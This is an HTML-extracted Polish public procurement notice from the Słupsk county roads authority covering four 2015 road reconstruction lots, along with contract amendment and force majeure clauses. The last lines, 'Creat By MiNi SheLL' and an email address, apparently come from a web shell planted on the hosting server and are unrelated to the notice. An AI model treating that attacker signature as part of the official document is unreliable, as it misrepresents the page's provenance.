Zmiany dotyczące sposobu wykonania robót budowlanych, technologii wykonania robót lub rozwiązań technicznych i materiałowych nie przewidzianych w umowie    w przypadku, w którym służyć  to będzie podniesienie standardu przedmiotu zamówienia lub zmiany te będą korzystne dla Zmawiającego i nie będzie to wykraczało poza określenie przedmiotu zamówienia zawartego w SIWZ ani nie zwiększy wynagrodzenia Wykonawcy.
W żadnym wypadku postanowień klauzuli pkt.20.6. nie należy interpretować jako udzielenie
dowolnej ze stron roszczenia do żądania zmiany umowy, a jedynie jako możliwość dokonania
zmiany umowy. 
Każda zmiana umowy musi być dokonana na piśmie w formie aneksu pod rygorem nieważności oraz
 wymaga zgody drugiej strony. 
 Strony nie będą ponosiły żadnej odpowiedzialności za częściowe lub całkowite nie wywiązanie się ze zobowiązań umownych spowodowanych przypadkami  siły wyższej. Przez siłę wyższą rozumie się wszelkie wydarzenia, których nie można było przewidzieć przy podpisywaniu umowy spowodowane wyjątkowymi okolicznościami, takimi jak: pożar, powódź, trzęsienie ziemi i inne kataklizmy przyrodnicze mające charakter siły wyższej. 
Strona poszkodowana przez siłę wyższą jest zobowiązana do bezzwłocznego poinformowania na
piśmie drugiej strony o jej wystąpieniu. W przypadku niespełnienia tego obowiązku, strona  
zainteresowana traci prawo do powoływania się na siłę wyższą. 
Po zakończeniu trwania siły wyższej, druga strona powinna być o tym natychmiast poinformowana.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.zdp.slupsk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Słupsku, ul. Słoneczna 16e, 76-200 Słupsk, pokój nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2015 godzina 09:00, miejsce: Zarząd Dróg Powiatowych w Słupsku, ul. Słoneczna 16e, 76-200 Słupsk, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE nr 1  Przebudowa drogi powiatowej 1135G w m. Zgojewo (Gmina Główczyce).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych przebudowy drogi powiatowej nr 1135G (Żelkowo  Zgojewo   Święcichowo  Damnica) od km 1+840 do km 2+840 w m. Zgojewo na łącznej długości 1,0km. Zakres prac obejmuje wykonanie na istniejącej jezdni asfaltowej odcinka podbudowy z kruszywa łamanego celem jej wyrównania, a następnie wykonanie nakładki bitumicznej z dwóch warstw betonu asfaltowego dla ruchu KR 1 2 warstwa wyrównawcza o grubości 3cm i warstwa ścieralna o grubości 3cm oraz obustronnych poboczy z kruszywa łamanego o szerokości 0,75m..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.32.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 94.00</li>
<li>2. Dodatkowa gwarancja - 6.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE nr 2   Przebudowa drogi powiatowej nr 1015G Słupsk   Możdżanowo (Gmina Słupsk).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych przebudowy drogi powiatowej nr 1015G (od dr. wojewódzkiej 203   Możdżanowo   Bruskowo Wielkie   Słupsk) na odcinku w m. Krzemienica oraz od m. Bruskowo Małe do m. Bruskowo Wielkie. Zakres prac obejmuje 
wykonanie w m. Krzemienica na istniejącej jezdni asfaltowej nakładki bitumicznej z dwóch warstw betonu asfaltowego dla ruchu KR 1-2: warstwa wyrównawcza o grubości 3cm i warstwa ścieralna o grubości 3cm oraz obustronnych poboczy z kruszywa łamanego o szerokości 0,75m,
wykonanie na odcinku  od m. Bruskowo Małe do m. Bruskowo Wielkie na istniejącej jezdni asfaltowej nakładki bitumicznej z dwóch warstw betonu asfaltowego dla ruchu KR 1-2: warstwa wyrównawcza 
o grubości 3cm i warstwa ścieralna o grubości 3cm oraz obustronnych poboczy z kruszywa łamanego o szerokości 0,75m oraz wykonanie zjazdu z drogi powiatowej na drogę gminną wraz z wykonaniem przepustu, w km 10+050, a także budowę zatoki autobusowej wraz z odcinkiem kolektora deszczowego w km 10+600..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.32.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 94.00</li>
<li>2. Dodatkowa gwarancja - 6.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE nr 3   Przebudowa drogi powiatowej nr 1143G Główczyce   Stowięcino w m. Warblino i
w m. Szczypkowice (Gmina Główczyce).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie przebudowy drogi powiatowej nr 1143G Główczyce - Stowięcino na odcinku od km 4+100 do km 4+460 w m. Warblino oraz na odcinku od km 5+900 do km 6+180 w m. Szczypkowice na łącznej długości 0,64km. W ramach przebudowy należy wykonać:

1. W m. Warblino:
chodniki z kostki betonowej szer. 1,5-2,0m o gr. 6cm na podsypce cementowo - piaskowej z warstwą odsączającą z pospółki o średniej grubości 40cm w obramowaniu obrzeży betonowych  i krawężników drogowych betonowych na ławie betonowej,
nakładkę bitumiczną na jezdni z betonu asfaltowego KR 1 2 warstwa wyrównawcza gr. 3cm i warstwa ścieralna gr. 3cm,
pobocza z kruszywa łamanego gr. 8cm o szerokości 0,75m,
oczyszczenie istniejącego przepustu pod drogą nr 1143G.

2. W m. Szczypkowice
chodniki z kostki betonowej szer. 1,5m o gr. 6cm na podsypce cementowo piaskowej z warstwą odsączającą z pospółki o gr. 10cm w obramowaniu obrzeży betonowych   krawężników drogowych betonowych na ławie betonowej,
zjazdy na posesje w obrębie chodnika z kostki betonowej o gr. 8cm na podsypce cementowo  piaskowej z podbudową z kruszywa łamanego gr. 20cm oraz warstwą odsączającą z pospółki o gr. 10cm w obramowaniu z krawężników drogowych betonowych na ławie betonowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.32.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE nr 4    Przebudowa drogi powiatowej nr 1139G Mianowice   Główczyce na odcinku
Karżniczka   Damnica (Gmina Damnica).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie przebudowy drogi powiatowej nr 1139G Mianowice   Główczyce na odcinku od km 15+900 do km 18+100  na długości 2,2km i powierzchni jezdni  9800m2. W ramach przebudowy należy wykonać nakładkę bitumiczną na jezdni z betonu asfaltowego KR 1-2 warstwa wyrównawcza gr. 3cm i warstwa ścieralna gr. 3cm, miejscową rozbiórkę nawierzchni i podbudowy wraz z odtworzeniem warstw konstrukcyjnych, pobocza z kruszywa łamanego gr. 7cm o szerokości 0,75m, pobocza z destruktu asfaltowego uzyskanego z frezowania nawierzchni gr. 7cm o szerokości 0,75m..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.32.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com